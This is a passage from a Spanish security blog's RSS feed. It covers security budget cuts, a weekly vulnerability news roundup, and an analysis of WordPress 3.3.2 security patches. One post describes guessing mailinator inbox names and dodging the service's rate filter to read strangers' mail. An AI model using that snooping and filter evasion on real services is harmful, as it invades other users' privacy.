&lt;/ul&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;&lt;b&gt;Sondas IDS/IPS&lt;/b&gt;: Si además de enterarnos/bloquear ataques de aplicación a nivel del firewall, es necesario almacenar eventos de ataque en otro tipo de redes no separadas por algún firewall/UTM (quizá sea un problema de diseño de la red), las sondas IDS/IPS deberían mantenerse, aunque puede migrarse a soluciones libres como Snort, el IDS/IPS libre por referencia. &lt;/li&gt;
&lt;/ul&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;&lt;b&gt;Consolidación y correlación de eventos&lt;/b&gt;: Típicamente muy caras, las soluciones comerciales tipo RSA Envision o HP Arcsight. Dado el gran número de elementos de una red grande, este tipo de dispositivos, hace manejable &lt;a href="http://www.securitybydefault.com/2008/08/plataformas-de-consolidacin-y.html"&gt;el saber "qué está pasando" en la red&lt;/a&gt; en todo momento, y ser capaces de encontrar un problema de forma rápida. Sin embargo, en época de recortes, se puede perder calidad de eventos/reporting yendo a herramientas económicas (o gratuitas) como &lt;a href="http://es.wikipedia.org/wiki/Open_Source_Security_Information_Management"&gt;OSSIM&lt;/a&gt; o &lt;a href="http://www.balabit.com/network-security/syslog-ng"&gt;Syslog-NG&lt;/a&gt; (salvando las enormes diferencias entre uno y otro) por ejemplo. &lt;/li&gt;
&lt;/ul&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;&lt;b&gt;Sistemas de monitorización&lt;/b&gt;: Herramientas comerciales conocidas y muuuy caras del estilo de HP Openview, pueden ser sustituidas por opciones libres como &lt;a href="http://www.cacti.net/"&gt;Cacti&lt;/a&gt; y/o &lt;a href="http://www.nagios.org/"&gt;Nagios&lt;/a&gt;. &lt;/li&gt;
&lt;/ul&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;&lt;b&gt;Sistemas Anti-DoS&lt;/b&gt;: Aquellas organizaciones que cuenten con este tipo de &lt;a href="http://www.securitybydefault.com/2010/10/como-mitigar-ataques-de-denegacion-de.html"&gt;soluciones "anti-Anonymous"&lt;/a&gt; del estilo de Arbor Networks (siempre he dudado de su efectividad ante un ataque con suficientes seguidores, pero bueno), deberán plantearse, si no suelen aparecer en las charlas de 4Chan, el considerar estas soluciones como algo "deseable" en vez de imprescindible.&amp;nbsp; &lt;/li&gt;
&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;Como vemos, hay tecnologías de seguridad perimetral en las que se puede ir a soluciones más baratas/libres, y aunque es complicado decidir qué piezas sacrificar, cierto es que nos hemos hartado de escribir posts en SbD en los que alertamos que ante &lt;a href="https://en.wikipedia.org/wiki/Advanced_persistent_threat"&gt;ataques dedicados y cuidadosamente preparados&lt;/a&gt;, es muy complicado mitigar, incluso no contando con más herramientas que la propia formación y costumbres de los usuarios. Por eso, una vez más repetimos eso de que "&lt;b&gt;no hay que recortar en educación&lt;/b&gt;", porque no se saca nada con disponer de herramientas que fortifiquen el acceso externo a una organización, cuando la peor amenaza es tener gente poco formada en seguridad trabajando dentro de ella.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-6417448612675055689?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/B7jl96s21TQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/B7jl96s21TQ/llegan-los-recortes-tambien-la.html</link><author>noreply@blogger.com (Lorenzo Martínez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-e_ZWNC7kX6o/T7jWIYJ1weI/AAAAAAAAA0w/DDJ1OHTPsE8/s72-c/stop-recortes.jpg" height="72" width="72" /><thr:total>12</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/llegan-los-recortes-tambien-la.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-6080366189147410702</guid><pubDate>Sun, 20 May 2012 08:00:00 +0000</pubDate><atom:updated>2012-05-20T10:00:05.985+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">secmana</category><title>Enlaces de la SECmana - 124</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s1600/informe-secmanal-banner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="88" src="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s1600/informe-secmanal-banner.jpg" width="399" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;El 10 de Mayo &lt;a href="http://pastebin.com/wamYsqTV"&gt;aparecía en pastebin un breve post acerca de una supuesta &lt;b&gt;backdoor en los teléfonos &amp;nbsp;Score M de ZTE&lt;/b&gt;&lt;/a&gt;&lt;b&gt;,&lt;/b&gt; cuyo sistema operativo corresponde con Android, y se distribuye en Estados Unidos. Consistía según la prueba en una aplicación con setuid-root que proporciona una shell &amp;nbsp;con privilegios máximos, siempre que se ejecute con un parámetro que corresponde con una palabra clave &lt;i&gt;hardcodeada&lt;/i&gt;. Pues bien, &lt;a href="http://www.reuters.com/article/2012/05/18/us-zte-phone-idUSBRE84H08J20120518"&gt;ZTE ha confirmado dicha aplicación y vulnerabilidad&lt;/a&gt;, la cual parece ser se utilizaba por la compañía para actualizar el dispositivo según un investigador...&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;&lt;a href="http://www.hopperapp.com/index.html"&gt;Hopper&lt;/a&gt;&amp;nbsp;&lt;/b&gt;para Mac OS X, desensamblador, decompilador y depurador y buena alternativa a IDA, ha sido &lt;a href="http://hopperapp.tumblr.com/post/22840649611/hopper-2-2-0-submitted-to-the-app-store"&gt;actualizado a la versión 2..2.0&lt;/a&gt;&amp;nbsp;y ya se encuentra disponible en la App Store utilizando &lt;a href="http://itunes.apple.com/us/app/hopper/id422856039?mt=12"&gt;este enlace&lt;/a&gt;.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Se está &lt;a href="http://www.exploit-db.com/exploits/18861/"&gt;explotando &lt;b&gt;una vulnerabilidad remota de PHP 5.4.3 &lt;/b&gt;&lt;/a&gt;&lt;b&gt;en Windows&lt;/b&gt;, aprovechando el fallo en la función &lt;i&gt;com_print_typeinfo&lt;/i&gt;, según &lt;a href="http://isc.sans.edu/diary/PHP+5+4+Remote+Exploit+PoC+in+the+wild/13255"&gt;informan en el blog del ISC de SANS.&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Gracias a un &lt;a href="http://twitter.com/#!/GotoHack/status/202139982675181569"&gt;tweet de Mathieu Renard&lt;/a&gt;&amp;nbsp;nos enteramos de la existencia de&amp;nbsp;&lt;a href="http://code.google.com/p/truecrack/"&gt;&lt;b&gt;TrueCrack&lt;/b&gt;&lt;/a&gt;,&amp;nbsp;un programa de fuerza bruta que pretende obtener contraseñas de volúmenes de TrueCrypt. Funciona en Linux y está optimizado para trabajar con tecnología Cuda de Nvidia.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;En el blog del&amp;nbsp;&lt;a href="http://blogs.technet.com/b/srd"&gt;&lt;i&gt;Security Research &amp;amp; Defense&lt;/i&gt; de Microsoft&lt;/a&gt; se anunció este pasado martes &lt;a href="http://blogs.technet.com/b/srd/archive/2012/05/15/introducing-emet-v3.aspx"&gt;la liberación de la &lt;b&gt;versión 3 de EMET&lt;/b&gt;,&lt;/a&gt;&amp;nbsp;Como principales novedades, cabe destacar la posibilidad de implantación en entornos corporativos mediante SCCM y política de grupo, capacidad de reporte mediante un notificador y un configurador más sencillo. Esta nueva versión se puede descargar de &lt;a href="http://www.microsoft.com/en-us/download/details.aspx?id=29851"&gt;este enlace.&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Una &lt;a href="http://www.kickstarter.com/blog/kickstarter-api-bug"&gt;&lt;b&gt;vulnerabilidad en la API de Kickstarter&lt;/b&gt;&lt;/a&gt; (página para el apoyo de ideas de proyectos, tambien conocido como &lt;i&gt;crowfunding&lt;/i&gt;) permitió acceder a más de 70,000 nuevas ídeas y futuros proyectos.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Una &lt;a href="http://www.zdnet.com/blog/security/avira-antivirus-update-cripples-millions-of-windows-pcs/12129"&gt;actualización del antivirus Avira&lt;/a&gt; (para versiones de pago) bloqueaba procesos críticos de Windows y software de terceros, &lt;b&gt;dejando inservibles millones de PCs&lt;/b&gt;, debido a que los detectaba como malware. En &lt;a href="http://forum.avira.com/wbb/index.php?page=Thread&amp;amp;postID=1179315#post1179315"&gt;este post del foro de Avira&lt;/a&gt; se discute el caso tras la queja por parte de un usuario.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.mail-archive.com/debian-bugs-dist@lists.debian.org/msg1022376.html"&gt;&lt;b&gt;Vulnerabilidad de Format String descubierta en el plugin pidgin-otr&lt;/b&gt;&lt;/a&gt;. El fallo, con identificador &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2369"&gt;CVE-2012-2369&lt;/a&gt;, podría ser explotado por un usuario remoto permitiendo la ejecución de código en el sistema afectado.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Anunciadas las &lt;a href="https://www.blackhat.com/html/bh-us-12/bh-us-12-briefings.html"&gt;&lt;b&gt;charlas confirmadas para la próxima Black Hat USA 2012&lt;/b&gt;&lt;/a&gt;, que se celebrará en Las Vegas el 25 y 26 de Julio. Cabe destacar la presencia de &lt;a href="http://www.twitter.com/chemaalonso"&gt;Chema Alonso&lt;/a&gt; con la &lt;a href="http://www.elladodelmal.com/2012/03/owning-bad-guys-mafia-with-javascript.html"&gt;charla sobre botnets Javascript&lt;/a&gt; que presentó en Rooted CON 2012 (&lt;a href="https://www.blackhat.com/html/bh-us-12/bh-us-12-briefings.html#Alonso"&gt;ampliada&lt;/a&gt;) y de &lt;a href="http://www.twitter.com/fjserna"&gt;Fermín J. Serna&lt;/a&gt; sobre &lt;a href="https://www.blackhat.com/html/bh-us-12/bh-us-12-briefings.html#Serna"&gt;técnicas a aplicar a vulnerabilidades que permitirían la fuga de información.&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Nueva lección del &lt;b&gt;proyecto &lt;a href="http://www.intypedia.com/?lang=es"&gt;Intypedia&lt;/a&gt;, &lt;/b&gt;&lt;a href="http://www.criptored.upm.es/intypedia/video.php?id=introduccion-funciones-hash&amp;amp;lang=es"&gt;&lt;b&gt;número 14&lt;/b&gt;, sobre funciones unidireccionales&lt;/a&gt; y su utilidad en las comunicaciones digitales.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-6080366189147410702?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/caUAV_gW-HI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/caUAV_gW-HI/enlaces-de-la-secmana-124.html</link><author>noreply@blogger.com (José A. Guasch)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s72-c/informe-secmanal-banner.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/enlaces-de-la-secmana-124.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-6255589064063209308</guid><pubDate>Fri, 18 May 2012 05:42:00 +0000</pubDate><atom:updated>2012-05-18T07:42:44.115+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">algo inutil</category><category domain="http://www.blogger.com/atom/ns#">bigbrother</category><category domain="http://www.blogger.com/atom/ns#">pastebin</category><category domain="http://www.blogger.com/atom/ns#">monitorización</category><title>En lo que pierdo el tiempo: mailinator</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a class="vt-p" href="http://1.bp.blogspot.com/-TfeJzsSQdjA/T6LO1nUZqkI/AAAAAAAAG8s/CNH02NEW-c8/s1600/big-brother-poster.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-TfeJzsSQdjA/T6LO1nUZqkI/AAAAAAAAG8s/CNH02NEW-c8/s200/big-brother-poster.jpg" width="186" /&gt;&lt;/a&gt;&lt;/div&gt;
Hace unos años &lt;a class="vt-p" href="http://www.securitybydefault.com/2009/12/pastebin-fuente-de-noticias.html"&gt;se puso de moda &lt;b&gt;monitorizar sitios como pastebin&lt;/b&gt;&lt;/a&gt;, incluso han nacido sitios dedicados exclusivamente a esto, como &lt;a class="vt-p" href="http://www.leakedin.com/"&gt;LeakedIn&lt;/a&gt; o cuentas de Twitter como&amp;nbsp;&lt;a class="vt-p" href="http://www.securitybydefault.com/2011/07/pastebin-leaks.html"&gt;PastebinLeaks&lt;/a&gt;&amp;nbsp;o &lt;a class="vt-p" href="https://twitter.com/#!/PastebinDorks"&gt;PastebinDorks&lt;/a&gt;. Todas tienen por objetivo buscar datos sensibles en los nuevos tablones de anuncios de Internet.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Por otra parte, &lt;a class="vt-p" href="http://www.securitybydefault.com/2009/11/todos-conocemos-ya-el-origen-de-la.html"&gt;también conocemos servicios web&lt;/a&gt; que nos brindan la posibilidad de usar &lt;b&gt;cuentas temporales de correo electrónico&lt;/b&gt; donde no guardaremos información sensible, y que preferimos facilitar antes que la de nuestro buzón real, como son &lt;b&gt;mailinator.com o trashmail.net&lt;/b&gt;. Este tipo de sitios no requiere autenticación, basta con introducir un nombre de usuario y &lt;i&gt;e voilà&lt;/i&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Ahora solo falta unir los dos puntos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Sin tener demasiado claro que me podía encontrar configuré &lt;a class="vt-p" href="http://pyropus.ca/software/getmail/"&gt;getmail&lt;/a&gt;, para descargarme&amp;nbsp;periódicamente los correos de basura de algunas cuentas de mailinator.com mediante &lt;a class="vt-p" href="http://www.mailinator.com/popfaq.jsp"&gt;POP3&lt;/a&gt;, &amp;nbsp;lo que me pareció mejor opción que usar el RSS o "scrapear" la página.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Con este propósito cree un archivo con los nombres propios más comunes&amp;nbsp;basándome&amp;nbsp;en el número de repeticiones del diccionario de nombres de facebook y palabras basadas en patrones de teclado, como son "qwerty" o "asdf". Muchos de estos patrones pueden ser calculados por john the ripper con el comando: &lt;b&gt;john -external=keyboard -stdout&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Una vez ejecutado contra un centenar de cuentas descubrí que mailinator ya contempla gente como yo y tras conectar varias veces, acabas en un filtro durante unos minutos, así que toco meter espacio temporal entre unas peticiones y otras.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Tras unos días bajando spam y correos varios de todos los buzones saqué una lista con los que más tráfico tienen. Por lo menos de la lista inicial.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para evitar el filtro anticotillas de mailinator, pensé en utilizar GMail como cliente POP3, ya que tienen decenas de direcciones IP desde las que realizan las conexiones y bloquearlo, es mucho más complicado que a mi pobre servidor. Pero por desgracia tan solo permite añadir &lt;b&gt;cinco cuentas de correo&lt;/b&gt;. Que anidando cuentas podrían ser muchas más. Pero para ir probando, suficiente, y más teniendo en cuenta que ya sabía las 5 con más datos al día.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a class="vt-p" href="http://4.bp.blogspot.com/-701ksIE73bk/T6MH8Es4MAI/AAAAAAAAG84/NUmQ6ixdp10/s1600/gmail1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="205" src="http://4.bp.blogspot.com/-701ksIE73bk/T6MH8Es4MAI/AAAAAAAAG84/NUmQ6ixdp10/s400/gmail1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Otra ventaja de utilizar &lt;b&gt;GMail es su filtro antispam&lt;/b&gt;, que catalogará este tipo de correos con una etiqueta adicional. &lt;b&gt;¡Ojo!, yo no digo que el objetivo de todo esto&lt;/b&gt;, hasta ahora nada claro, &lt;b&gt;no sea tener decenas de miles de correos de spam para montarme mi propio servicio o tal vez buscar correos con malware.&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Unos días después ya se pueden consultar los primeros resultados: &lt;b&gt;muchos registros en portales de citas de todos los países del mundo, registros de páginas porno, registros en foros, bastante malware y por supuesto... miles de correos con spam.&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a class="vt-p" href="http://3.bp.blogspot.com/-ArNNiE0kx8k/T6MMPjPALbI/AAAAAAAAG9E/fwVe8NV9PfE/s1600/04-05-2012+0-52-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="203" src="http://3.bp.blogspot.com/-ArNNiE0kx8k/T6MMPjPALbI/AAAAAAAAG9E/fwVe8NV9PfE/s400/04-05-2012+0-52-41.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por seguir experimentando usé &lt;a class="vt-p" href="http://pipes.yahoo.com/pipes/"&gt;Yahoo Pipes&lt;/a&gt;, hice &lt;a class="vt-p" href="http://pipes.yahoo.com/pipes/pipe.info?_id=75c51f677331650b6f968c9c6bbe34d7"&gt;un ejemplo que obtenía 20 RSS&lt;/a&gt;, los mezclaba y eliminaba duplicados, creando un nuevo RSS "limpio" que poder visitar:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a class="vt-p" href="http://2.bp.blogspot.com/-zw0EvxGhx78/T6OB0uafo_I/AAAAAAAAG9Y/CbPWS0y7mH4/s1600/yahoopipe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="242" src="http://2.bp.blogspot.com/-zw0EvxGhx78/T6OB0uafo_I/AAAAAAAAG9Y/CbPWS0y7mH4/s400/yahoopipe.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Al final, tampoco he encontrado en estos días nada especialmente asombroso, por lo menos en este tiempo. Pero cuando uno mira por un agujerito, nunca sabe que se va a encontrar y cuánto tiempo ha de mirar para ver pasar algo.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-6255589064063209308?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/me6NrySi0oM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/me6NrySi0oM/en-lo-que-pierdo-el-tiempo-mailinator.html</link><author>noreply@blogger.com (Alejandro Ramos)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-TfeJzsSQdjA/T6LO1nUZqkI/AAAAAAAAG8s/CNH02NEW-c8/s72-c/big-brother-poster.jpg" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/en-lo-que-pierdo-el-tiempo-mailinator.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-4299264138072831442</guid><pubDate>Thu, 17 May 2012 05:04:00 +0000</pubDate><atom:updated>2012-05-17T07:06:54.285+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">analisis de vulnerabilidades</category><category domain="http://www.blogger.com/atom/ns#">wordpress</category><title>Analizando las vulnerabilidades remotas de versiones anteriores a Wordpress 3.3.2</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-vMdkmkmAUnQ/TyDpAStsMbI/AAAAAAAAA6w/SIk0dFB3p3k/s320/logo-wordpress.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-vMdkmkmAUnQ/TyDpAStsMbI/AAAAAAAAA6w/SIk0dFB3p3k/s320/logo-wordpress.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hace unas semanas se &lt;a href="http://wordpress.org/news/2012/04/wordpress-3-3-2/"&gt;anunciaba la versión 3.3.2 de Wordpress&lt;/a&gt;, que incluía entre otras cosas, 6 correcciones de seguridad, referentes a varias vulnerabilidades remotas encontradas, y de varios tipos. Ayer en el &lt;a href="http://www.twitter.com/daboblog"&gt;twitter de Daboblog&lt;/a&gt; nos recomendaba parchear nuestros blogs a su última versión debido a estas vulnerabilidades:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-vO5CGjKfqbw/T7SHTD7hFII/AAAAAAAABE0/jTE1PKMNZMA/s1600/twitt-daboblog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="136" src="http://2.bp.blogspot.com/-vO5CGjKfqbw/T7SHTD7hFII/AAAAAAAABE0/jTE1PKMNZMA/s400/twitt-daboblog.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Tres de ellas (&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2399"&gt;CVE-2012-2399&lt;/a&gt;,&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2400"&gt;CVE-2012-2400&lt;/a&gt; y&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2401"&gt;CVE-2012-2401&lt;/a&gt;) fueron detectadas en librerías externas que utiliza Wordpress para subir ficheros en la sección de Multimedia, mediante &lt;b&gt;Plupload&lt;/b&gt;, &lt;b&gt;SWFUpload&lt;/b&gt; (librería anterior) y &lt;b&gt;SWFObject&lt;/b&gt; (esta última se encuentra incluída dentro de muchos &lt;i&gt;themes&lt;/i&gt;, y se utiliza para incrustar contenido Flash).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para estas tres vulnerabilidades, podemos obtener detalles más técnicos referentes a ellas, simplemente &lt;a href="http://core.trac.wordpress.org/changeset?new=20554@branches/3.3&amp;amp;old=20087@branches/3.3"&gt;revisando los diff de archivos entre ramas de versiones&lt;/a&gt;:&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-XtxGtpPra3c/T7SAh2i2ADI/AAAAAAAABEA/RmVmZJkDT7U/s1600/diff-branches-wp3.3.2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="327" src="http://3.bp.blogspot.com/-XtxGtpPra3c/T7SAh2i2ADI/AAAAAAAABEA/RmVmZJkDT7U/s400/diff-branches-wp3.3.2.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Como ejemplo, en el caso de la librería SWFObject (utilizada no sólo en Wordpress), el fallo radica en que &lt;a href="http://core.trac.wordpress.org/changeset?new=20554@branches/3.3&amp;amp;old=20087@branches/3.3#file3"&gt;no se codificaba previamente el valor de MMredirectURL&lt;/a&gt;,&amp;nbsp;&lt;i&gt;O.location&lt;/i&gt;, variable Flash utilizada en su instanciación.&amp;nbsp;En la actualización del fichero Javascript, se realiza una codificación de la URL mediante la función encodeURI:&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-r66du4JdaUo/T7SB5-7xSXI/AAAAAAAABEI/rYWMgQx3JQM/s1600/diff-swfobject.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="345" src="http://3.bp.blogspot.com/-r66du4JdaUo/T7SB5-7xSXI/AAAAAAAABEI/rYWMgQx3JQM/s400/diff-swfobject.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
De las otras 3 vulnerabilidades (&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2402"&gt;CVE-2012-2402&lt;/a&gt;,&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2403"&gt;CVE-2012-2403&lt;/a&gt;&amp;nbsp;y&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2404"&gt;CVE-2012-2404&lt;/a&gt;) se dispone de más información, tratándose de Cross-Site Scriptings y una evasión limitada de restricciones.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;CVE-2012-2402&lt;/b&gt; - Se actualiza el fichero &lt;i&gt;plugins.php&lt;/i&gt;, habiéndose descubierto la posibilidad de desactivar plugins por parte de usuarios administradores, para toda una red creada de blogs bajo una misma instalación, aun teniendo dicha restricción activada. Esta vulnerabilidad se ha categorizado como baja. A continuación podremos ver los cambios realizados, referentes a una comprobación utilizada para verificar que no se desactivaban plugins que ya estaban desactivados:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-ZaDRk19n7yo/T7SD5WKFZ2I/AAAAAAAABEQ/_j4ri_Sedf4/s1600/plugins-upd-wp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://1.bp.blogspot.com/-ZaDRk19n7yo/T7SD5WKFZ2I/AAAAAAAABEQ/_j4ri_Sedf4/s400/plugins-upd-wp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;CVE-2012-2403&lt;/b&gt; - Se actualiza el fichero&amp;nbsp;&lt;a href="http://core.trac.wordpress.org/changeset?new=20554@branches/3.3&amp;amp;old=20087@branches/3.3#file15" style="font-style: italic;"&gt;wp-includes/formatting.php,&lt;/a&gt;&amp;nbsp;cuya función vulnerable era aquella que intentaba habilitar enlaces clicables (&lt;i&gt;make_clickable&lt;/i&gt;) dentro de atributos, permitiendo la realización de ataques Cross-Site Scripting. Dicha función se ha re-escrito completamente:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-2BwH_KBzL6g/T7SEzm0xzCI/AAAAAAAABEY/RXEAxhUzTNQ/s1600/formatting-wp-upd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="153" src="http://3.bp.blogspot.com/-2BwH_KBzL6g/T7SEzm0xzCI/AAAAAAAABEY/RXEAxhUzTNQ/s400/formatting-wp-upd.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
